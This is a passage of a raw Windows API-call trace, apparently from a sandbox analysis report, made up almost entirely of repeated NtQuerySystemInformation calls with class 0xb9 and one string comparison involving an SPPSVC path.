ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9e0, Length=0x28, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x48, ResultLength=0x0) [0211.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa8, Length=0x48, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x48, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x40, ResultLength=0x0) [0211.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0211.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0211.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0211.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0211.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0211.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.643] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x50, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x50, ResultLength=0x0) [0211.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd510, Length=0x28, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x28, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0211.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x28, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4e0, Length=0x20, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.655] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x38, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd560, Length=0x20, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4f0, Length=0x20, ResultLength=0x0) [0211.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x28, ResultLength=0x0) [0211.657] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0211.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x28, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.664] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0211.669] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.670] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 